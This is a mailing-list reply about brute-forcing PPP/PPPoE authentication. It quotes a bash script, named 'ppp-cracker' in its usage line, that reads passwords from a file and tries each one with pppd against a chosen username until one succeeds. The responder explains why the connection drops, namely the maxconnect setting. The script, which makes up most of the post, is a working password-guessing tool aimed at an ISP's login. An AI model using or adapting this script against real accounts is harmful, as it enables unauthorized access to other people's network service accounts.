Re: PPP authentication brute-force attack?



Matheus Michels wrote:

This is exactly what I wanted. I made this little script based on yours:

#!/bin/bash

SETSID=/usr/bin/setsid
PPPD=/usr/sbin/pppd
PPPOE=/usr/sbin/pppoe

PPPD_OPTIONS="noipdefault noauth default-asyncmap defaultroute hide-password nodetach usepeerdns mtu 1492 mru 1492 noaccomp noccp nobsdcomp nodeflate nopcomp novj novjccomp lcp-echo-interval 30 lcp-echo-failure 3 pap-max-authreq 2 pap-restart 3 maxconnect 5"
PPPOE_OPTIONS="-I eth0"

PASSWORDS=/home/matheus/pass.txt

if test "$1" = "" ; then
echo "$0: Usage: ppp-cracker user">& 2
exit 1
fi

while read passwd; do
$SETSID $PPPD pty "$PPPOE $PPPOE_OPTIONS" $PPPD_OPTIONS user "$1" password "$passwd"
if [ $? -eq 0 ]; then
echo "Found password: $passwd"
break
fi
done < $PASSWORDS


I've copied some parts from the adsl-start and adsl-connect scripts. Actually, the script
> is not functional yet. It authenticates and, some seconds later, exits with an input/output error.
> But I'm doing some changes based on the scripts shipped with RP-PPPOE and I'm almost getting the
> script to work.

We are setting maxconnect to 5 seconds, so our pppd closes the connection. If you don't want that, don't use the maxconnect parameter.

--
Zsolt

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------